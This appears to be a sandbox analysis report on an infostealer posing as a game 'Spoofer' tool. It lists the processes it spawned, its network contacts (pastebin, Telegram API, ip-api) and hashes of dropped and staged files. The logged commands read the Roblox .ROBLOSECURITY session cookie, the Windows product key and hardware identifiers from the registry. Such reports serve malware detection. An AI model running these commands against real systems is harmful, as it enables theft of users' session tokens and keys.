C:\Windows\system32\cmd.exe /c "wmic bios get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kpo4xmkb\kpo4xmkb.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES32D3.tmp" "c:\Users\Admin\AppData\Local\Temp\kpo4xmkb\CSCAAEAC91A688F4922953866F06F81D873.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "hostname"

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c title LKcmdPerm SpooferV2.0.1 I KERNELMODE ENABLE I WELCOME Tyebxljn

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c color 0b

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
US 208.95.112.1:80 ip-api.com tcp
GB 216.58.204.67:443 gstatic.com tcp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 208.95.112.1:80 ip-api.com tcp
NL 149.154.167.220:443 api.telegram.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\python312.dll

MD5 166cc2f997cba5fc011820e6b46e8ea7
SHA1 d6179213afea084f02566ea190202c752286ca1f
SHA256 c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
SHA512 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe

MD5 2b294a8817d326c1e1305ce914688b91
SHA1 b0027fc13ed4b1f1be406f0ef86dee845726a063
SHA256 1afd5a86aaf077ef695981df90cba9e673f56e4adfb575ccacbf79343c7b30f7
SHA512 cbdc488319d858babe564965e10c0a01c122e1d0f65210618e40c3ae97cdee1e8102afcb2c851cb138da4f085957522f5cf5ac94a27e9eb25d57337a1e7c9b72

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

MD5 69801d1a0809c52db984602ca2653541
SHA1 0f6e77086f049a7c12880829de051dcbe3d66764
SHA256 67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3
SHA512 5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

MD5 7c14c7bc02e47d5c8158383cb7e14124
SHA1 5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3
SHA256 00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5
SHA512 af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd

MD5 90f080c53a2b7e23a5efd5fd3806f352
SHA1 e3b339533bc906688b4d885bdc29626fbb9df2fe
SHA256 fa5e6fe9545f83704f78316e27446a0026fbebb9c0c3c63faed73a12d89784d4
SHA512 4b9b8899052c1e34675985088d39fe7c95bfd1bbce6fd5cbac8b1e61eda2fbb253eef21f8a5362ea624e8b1696f1e46c366835025aabcb7aa66c1e6709aab58a

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-3.dll

MD5 4ff168aaa6a1d68e7957175c8513f3a2
SHA1 782f886709febc8c7cebcec4d92c66c4d5dbcf57
SHA256 2e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950
SHA512 c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-3.dll

MD5 123ad0908c76ccba4789c084f7a6b8d0
SHA1 86de58289c8200ed8c1fc51d5f00e38e32c1aad5
SHA256 4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43
SHA512 80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_brotli.pyd

MD5 9ad5bb6f92ee2cfd29dde8dd4da99eb7
SHA1 30a8309938c501b336fd3947de46c03f1bb19dc8
SHA256 788acbfd0edd6ca3ef3e97a9487eeaea86515642c71cb11bbcf25721e6573ec8
SHA512 a166abcb834d6c9d6b25807adddd25775d81e2951e1bc3e9849d8ae868dedf2e1ee1b6b4b288ddfbd88a63a6fa624e2d6090aa71ded9b90c2d8cbf2d9524fdbf

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\_hashlib.pyd

MD5 a25bc2b21b555293554d7f611eaa75ea
SHA1 a0dfd4fcfae5b94d4471357f60569b0c18b30c17
SHA256 43acecdc00dd5f9a19b48ff251106c63c975c732b9a2a7b91714642f76be074d
SHA512 b39767c2757c65500fc4f4289cb3825333d43cb659e3b95af4347bd2a277a7f25d18359cedbdde9a020c7ab57b736548c739909867ce9de1dbd3f638f4737dc5

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_queue.pyd

MD5 e1c6ff3c48d1ca755fb8a2ba700243b2
SHA1 2f2d4c0f429b8a7144d65b179beab2d760396bfb
SHA256 0a6acfd24dfbaa777460c6d003f71af473d5415607807973a382512f77d075fa
SHA512 55bfd1a848f2a70a7a55626fb84086689f867a79f09726c825522d8530f4e83708eb7caa7f7869155d3ae48f3b6aa583b556f3971a2f3412626ae76680e83ca1

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd

MD5 30f396f8411274f15ac85b14b7b3cd3d
SHA1 d3921f39e193d89aa93c2677cbfb47bc1ede949c
SHA256 cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f
SHA512 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md.pyd

MD5 d9e0217a89d9b9d1d778f7e197e0c191
SHA1 ec692661fcc0b89e0c3bde1773a6168d285b4f0d
SHA256 ecf12e2c0a00c0ed4e2343ea956d78eed55e5a36ba49773633b2dfe7b04335c0
SHA512 3b788ac88c1f2d682c1721c61d223a529697c7e43280686b914467b3b39e7d6debaff4c0e2f42e9dddb28b522f37cb5a3011e91c66d911609c63509f9228133d

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md__mypyc.pyd

MD5 bf9a9da1cf3c98346002648c3eae6dcf
SHA1 db16c09fdc1722631a7a9c465bfe173d94eb5d8b
SHA256 4107b1d6f11d842074a9f21323290bbe97e8eed4aa778fbc348ee09cc4fa4637
SHA512 7371407d12e632fc8fb031393838d36e6a1fe1e978ced36ff750d84e183cde6dd20f75074f4597742c9f8d6f87af12794c589d596a81b920c6c62ee2ba2e5654

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\unicodedata.pyd

MD5 a8ed52a66731e78b89d3c6c6889c485d
SHA1 781e5275695ace4a5c3ad4f2874b5e375b521638
SHA256 bf669344d1b1c607d10304be47d2a2fb572e043109181e2c5c1038485af0c3d7
SHA512 1c131911f120a4287ebf596c52de047309e3be6d99bc18555bd309a27e057cc895a018376aa134df1dc13569f47c97c1a6e8872acedfa06930bbf2b175af9017

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\_lzma.pyd

MD5 9e94fac072a14ca9ed3f20292169e5b2
SHA1 1eeac19715ea32a65641d82a380b9fa624e3cf0d
SHA256 a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f
SHA512 b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

MD5 50ea156b773e8803f6c1fe712f746cba
SHA1 2c68212e96605210eddf740291862bdf59398aef
SHA256 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47
SHA512 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

MD5 5377ab365c86bbcdd998580a79be28b4
SHA1 b0a6342df76c4da5b1e28a036025e274be322b35
SHA256 6c5f31bef3fdbff31beac0b1a477be880dda61346d859cf34ca93b9291594d93
SHA512 56f28d431093b9f08606d09b84a392de7ba390e66b7def469b84a21bfc648b2de3839b2eee4fb846bbf8bb6ba505f9d720ccb6bb1a723e78e8e8b59ab940ac26

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\plugin\run.bat

MD5 16bba83c87bfbe567572aa42803e4001
SHA1 ab41f7b40ac02fd4a3c47bd1ea95e2cbff6a3af6
SHA256 e6b3d93588c9a5a44f8f162f9928ce745138bd9d4ac9fd43bbdd2f20caf6ab45
SHA512 ca6210895e5b5a08abfa619fac1cb84b0299a0a63016ae8f3e2d47601aa5ed4134bd88bcf911037d5f786b25017f0758c059253cc8b24f07f7fdfd67fc432153

C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe

MD5 8f0d4c1ab369737cbfee9bd1a84f87a3
SHA1 09a371c621f788450523961a75ae31b0631ad6af
SHA256 31468061fbaf78650c2046c7458fa54b762fe00b5abba52b85063ce6dd357770
SHA512 87bff47dbaf3136c527acf89ee4532e0f54d2694dfa5ce9cc6bcca3b0f49bd16e31d616efd8d0813be2f732e66ac3614481984c7a73025c5fed20c117f368faa

C:\Users\Admin\AppData\Local\Temp\ONEFIL~2\sqlite3.dll

MD5 f3592da629e4f247598e232b2cbfbac1
SHA1 65429fbec3f5545640f2cda784dc7dcca420eb3b
SHA256 054a7b736de7afbd447b07ee5e72df2febcaa06758f7a028873771567e8735d3
SHA512 6fc24890a7be1ed73f1efdf2b7723c3a7de5ddb36b87ff7b01949fc2b14813e7b7c8b8311abee2796a9a4efffedfc1d2020ffa794e59004ca4fb6798b993190d

memory/3544-142-0x00007FF667340000-0x00007FF6685D1000-memory.dmp

memory/4800-166-0x00007FF7AABA0000-0x00007FF7AB738000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\_wmi.pyd

MD5 827615eee937880862e2f26548b91e83
SHA1 186346b816a9de1ba69e51042faf36f47d768b6c
SHA256 73b7ee3156ef63d6eb7df9900ef3d200a276df61a70d08bd96f5906c39a3ac32
SHA512 45114caf2b4a7678e6b1e64d84b118fb3437232b4c0add345ddb6fbda87cebd7b5adad11899bdcd95ddfe83fdc3944a93674ca3d1b5f643a2963fbe709e44fb8

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\_decimal.pyd

MD5 7ae94f5a66986cbc1a2b3c65a8d617f3
SHA1 28abefb1df38514b9ffe562f82f8c77129ca3f7d
SHA256 da8bb3d54bbba20d8fa6c2fd0a4389aec80ab6bd490b0abef5bd65097cbc0da4
SHA512 fbb599270066c43b5d3a4e965fb2203b085686479af157cd0bb0d29ed73248b6f6371c5158799f6d58b1f1199b82c01abe418e609ea98c71c37bb40f3226d8c5

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\vcruntime140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\_sqlite3.pyd

MD5 64417c2ccd84392880b417e8a9f7a4bc
SHA1 88c6139471737b14d4161c010b10ad9615766dbb
SHA256 fdeacc2aff71fe21d7a0de0603388299fa203c2692fdbdb3709f1bc4cc9cdc0e
SHA512 05163d678f18ea901c5da45f41ee25073b7834e711c2809f98df122e6485b3979c5331709a6f48079a53931d3dbc3b569738b51736260ce1b67811c073c7ea84

memory/4828-188-0x000001CBD6F30000-0x000001CBD6F52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ypccf3vs.3go.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4800-189-0x00007FF7AABA0000-0x00007FF7AB738000-memory.dmp

memory/3344-191-0x00007FF7B1C40000-0x00007FF7B24F0000-memory.dmp

memory/3448-190-0x00007FF789870000-0x00007FF78AAFD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\python3.dll

MD5 5eace36402143b0205635818363d8e57
SHA1 ae7b03251a0bac083dec3b1802b5ca9c10132b4c
SHA256 25a39e721c26e53bec292395d093211bba70465280acfa2059fa52957ec975b2
SHA512 7cb3619ea46fbaaf45abfa3d6f29e7a5522777980e0a9d2da021d6c68bcc380abe38e8004e1f31d817371fb3cdd5425d4bb115cb2dc0d40d59d111a2d98b21d4

C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\_cffi_backend.pyd

MD5 fcb71ce882f99ec085d5875e1228bdc1
SHA1 763d9afa909c15fea8e016d321f32856ec722094
SHA256 86f136553ba301c70e7bada8416b77eb4a07f76ccb02f7d73c2999a38fa5fa5b
SHA512 4a0e98ab450453fd930edc04f0f30976abb9214b693db4b6742d784247fb062c57fafafb51eb04b7b4230039ab3b07d2ffd3454d6e261811f34749f2e35f04d6

C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\bcrypt\_bcrypt.pyd

MD5 829ac778d5a82a72fd5f83312d929a93
SHA1 b42fc4b15c7f9ad2bb84a0cc07040701ea462a0f
SHA256 3d26efeedd40e9cb67d66803b235f56d38a5932d1d82b86cae4edace5385d27a
SHA512 d76f474ebc9bb9e84aaa989b40cf9783469757b535424db3913fb4bb1c39014e4b17f0067232dcefd9a5429dd0d4ae9ec15dbce99cb2fbf285f745739f32d22b

memory/3536-198-0x00007FF6C7900000-0x00007FF6C85C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\cryptography\hazmat\bindings\_rust.pyd

MD5 81ad4f91bb10900e3e2e8eaf917f42c9
SHA1 840f7aef02cda6672f0e3fc7a8d57f213ddd1dc6
SHA256 5f20d6cec04685075781996a9f54a78dc44ab8e39eb5a2bcf3234e36bef4b190
SHA512 11cd299d6812cdf6f0a74ba86eb44e9904ce4106167ebd6e0b81f60a5fcd04236cef5cff81e51ed391f5156430663056393dc07353c4a70a88024194768ffe9d

memory/5012-199-0x00007FF764D00000-0x00007FF76588B000-memory.dmp

memory/1688-281-0x00007FF708D50000-0x00007FF709846000-memory.dmp

memory/2904-290-0x00007FF79AA50000-0x00007FF79C11F000-memory.dmp

memory/5012-296-0x00007FF764D00000-0x00007FF76588B000-memory.dmp

memory/1540-302-0x0000021CAC0C0000-0x0000021CAC0C8000-memory.dmp

memory/1688-357-0x00007FF708D50000-0x00007FF709846000-memory.dmp

memory/2904-366-0x00007FF79AA50000-0x00007FF79C11F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Desktop\BlockGroup.mp4

MD5 854861b1513c9fee88633c6a0b22d7c7
SHA1 c5826ce0972ad0af445ca62f065e98a495d0446d
SHA256 9634f8470ee7d7d2fec7703887d2a89cb204988797885e53abaa0b18365199c3
SHA512 6cba375d4711c527912fe6793151a46672161695849d115b57a1ca0f65c655e3342b5aabd662a447f343cceaf17e9a6eeb3ff77359f3f336e8595445b4707885

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Desktop\ConnectUnlock.docx

MD5 fc82aed340df49d870068e846068c51d
SHA1 6b573b5aeb0e7a6c5607d66f3567e8dc721d175e
SHA256 93a585c81d7c49de929034a37a43a10e5ec1496af8be9a20679c12233c473743
SHA512 18475eef4d096150c62314bfb785e7d6383d555e0340f9419d530caf7745749b882ffdd090bee919d0f402365a2088c69592270c6296e3d48128db50ee17a372

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Desktop\FormatUndo.mp4

MD5 c82f2105ee621a7a4b17adaf5ff24923
SHA1 894e1f2de84a1c5af9c4ec20db220f22b58cf271
SHA256 b74bf73c394f5cedcfd3b0adb265fc2f86a3bf57798012598b5b5fcc808b30c6
SHA512 cfd5508423dfb8fd5e3859c1637065e4fa1e0cf4d968342dc3d88b9d0aa480252bd348e6cbe3c7238e56b982ae7723f342427643bbaa545edb5b247b93b7ed1d

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Desktop\PopMove.docx

MD5 0d5e27a2bd03579b5d0288508aa97cfb
SHA1 61a69d28eb322e127e49636960b40252d932d45f
SHA256 de90f1e87390addde3935362bc82a3e110e8cb34dc094decccc5135982a6092e
SHA512 9c59a9f36f1e89e941819f0f0d91b1aa88b067ab16c68003fa243ab1e25d088b847eadbc934a47468c3b0283525b14374481102fad258440862dfedee2d6b094

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\PublishRedo.xlsx

MD5 4f54ab34036be6820e6167f9aefe280f
SHA1 7958e52a3dac3019783d73a7d1be3e3bd2b3dd8a
SHA256 76f8beba3680a2d8dce24dde001f1bb88da426c628741cddc07e554f1e34c38f
SHA512 52ce7d9656c886f2f4c16b806d032b10184a23cb9d172d3714a0db2a3cf98aeb47b59f5f4cf4f5af78f5d38a81d7814d58a2d4a7ed6ae035cfe6c11e3fe6b532

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\MeasureAdd.docx

MD5 a85d612d78245a79ba4a1ba72d6cd8bf
SHA1 01e8e1d8eea5624213eb58cea39e510e76057bff
SHA256 ab8f666578cbbef16b257fc7a6bb00889b08d45689ac887d456fb8a8ccb3d7ed
SHA512 c84d819eb620b419fe017b7b548ebfa65bcadd7a689cde6c53a07471c05d20fa39cdaeecb2919d19d527829cd307d2f5a0c7c4c9cfc4d270ed28cb9b2ae105d7

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\LockCompress.csv

MD5 4eb97f4229920de87a35a8c7e9278f53
SHA1 333c5d9d95438ac3b6b827ee3b3f1bf01fa94b8b
SHA256 aec3ca381e5515114a618e78d453da5f839823d8545e6d925cf63c451892b487
SHA512 65198255fc56d09e8b2c08a9c4689d32c60d48e2189b321aa2537509bfdcb904e1b1b987bffcd98646ac0042c5d6ab1e72351db936391ad33ff29e580793b20a

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\CheckpointConvertTo.docx

MD5 966274f6d75e1194200821685b22f613
SHA1 d29dc97f944427ac4b9f2ac75757c1f8c0ca43dc
SHA256 954c226c5c4cd02101c0b473c3a648df6a3e2be522a1163db32e3e27b4422a6e
SHA512 19b78b221f401c39a20e02e222d222308893a084b9da39d7f717b8b7dc7cb6b397a8a3345ad77356b6edb85e6cb168ba4fd0adfcfc0f1055fe573f6494f5baea

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\RegisterRequest.xlsx

MD5 b2cf35d34c7eeea9595ca86d29fe3088
SHA1 8453cdf847e81c841e3a0106df84507bc830dd8a
SHA256 cbb45ca218fcd89371424e7783a3fa92f7f6be486d337a7d73382552da326c2b
SHA512 15a08ff30b395ce187399688ff950aaa274ae91583cb5c84034d94734eac1f94611972dbeb8b89c0faec12f37a9c2fada0acffe9fae9f7b0174fd75e19cd14e7

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\RestoreClear.csv

MD5 6398796fea6881c3d95f45b86b42e540
SHA1 8cf6883ad0bddb067089b9e90abe16bc4072ff71
SHA256 ee0e846b2928d7491b5534e6cba0d96ca9a14ca61b77b91f3f86e550cba0e408
SHA512 1091b53a0c7064aa7ddbaae8226b15957b337d5fae7b03eb17c3ce2f34e8351331250af37e01938e6c024933f186bdc08fdd73df90dd6dbf249835cb4e71da10

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\SendUnregister.txt

MD5 05653d97efca92edb95566fc207cc557
SHA1 1149508c66540ddb4ad40e530ea4f9f91a7d1c49
SHA256 fe1de898734274f579d2613b7254e97aaca50253c8b81d992406fc3504fbe556
SHA512 deed5c4272c10b597617bd9c7dd3ae1fd231e2853f153d663b449956513e7baccc9840c991a026c370ab353ae7221dddb34b5777b087c6dd31bdec87ee539131

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\WriteRestore.csv

MD5 9076e2d2f6d9851079e565e18b3bd84e
SHA1 250ce06a869573b43cdd3d1455573b20c3e52f45
SHA256 3b3dab8b3a6798525ab10f7e97de8a6fce1c83e72aba80620bd40b375fb32ebc
SHA512 ceac6ce50c34108e503b9573d9c85a8a5b7285b49160c1d5a48ac533106a5cae84a4f25781177175dc3ff4d53c4f232f86ace15a08bb8cefdc68361b4793ab89

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Documents\UpdateApprove.docx

MD5 798b7e3dcb85282bb310ff12e27c041f
SHA1 b6fd744a99875e90180fda1557632a5ae4045c2a
SHA256 5e35d9950165403f1edcb903763ce949a3a23277ed94b533b3946d6c71dc9a20
SHA512 12d84b0fa787d7e4b906c2a1a49b46a925c3a9e2f07481bd6e14a6c1aaeb9e83c7036f5ea447c056da242770a5f1eb13d1035abd1c7dbd4f77be1c26f395c64b

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\ExitWatch.png

MD5 bb997d368e71bf02673e8cdd9812cc13
SHA1 61051ea9a0a6a365f04afda916cb60cf6acdb653
SHA256 5e07646657c6aaf979aef81ee3d9159d0015481a2459bf7164b4f8a11bd563d8
SHA512 4250def566c2eaa44d23dc333e2b97b94e526426fe93d5ce4c9db9b3659536f74cf96bf507a05ffca2089a8d4349f60d317496624be0414243fdce5e3469154e

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\InitializeEnter.mp3

MD5 8fc5ba0eb97cfb10f9fe88eb6b29063f
SHA1 7e87748863c9158726e46c5923f54e292b29e575
SHA256 d2959f0b3bb79f43bf6884b411273941848f922a3e5a4c12c238b75b50efe541
SHA512 b45b7860c1b73886241c656e52a066396d71478e101c2b22c3a712cacd31faf9d8b31990edb2cf84ea42805018edd3689c1900db5cfd81f6ee6fb55458cb751f

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\MeasureProtect.mp4

MD5 75c8f683ad31887989b7db2e16a51c85
SHA1 ced2a46eac4f1a7b8e3740f1e0365a74deff8f1b
SHA256 072eb6c5249e427d7200cf84b545b5ae60ba51cff34b6510955748923382dcd8
SHA512 4e19dd8a6ec0f15618879b64d25096561c76a8d841086c7adb068f1008d20b4f4933c3e51e9ba77fd70af8cb8f17bf0839baeca11e5a9edb87c73f23f3b7ff8e

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\MoveResume.doc

MD5 35222d4bc0bc9832a8ce570d05b69d1c
SHA1 57782bf12ce442157d91c89e0a780585e26f4dc0
SHA256 5761a4304c221cb3dce834d88f01c787b4a766bee23b554dfbf3108fc022472b
SHA512 1b705ac82ca881c8bd8b70918a611a98d5f734dc8730bcb38830188fb2213cdf38529e38c7ca80c155ab15120e37ec2195b49cbf6ca582b851e114554010f646

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\PushWrite.jpeg

MD5 db37f8f779749069bae4fd0bfa172ae2
SHA1 397476f095c9b3a0219e4a6e072c23dd8d114761
SHA256 e5a66dfab2b41ba9973d2b931301ceddc2ebbc6b0c171a49c2d1678826409190
SHA512 47551226ebd57fb21c101ec247d72a7f801cb64d70387dcf6459c9a40dd58236dd2f6322399f40fa3240cd51aa36ed2bc91cbac366a95b664f230106d757258f

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\SuspendInstall.png

MD5 dfa5fab0bcd9a977e789709df17bae4b
SHA1 e9b7d8cebaac11de981a55d65826e107b7423de4
SHA256 383902a922b08f5629637b6d5b572f76bd1d976520ac963e651631d09d019029
SHA512 2e0f053e0b0c963a68a96d3f32d2d7fd5df0eb51431384c549d2988d32b06063f2484f2501b101e9fb303366e7f6818bec7715c8ecf8d58efe7e8edfcf9ba773

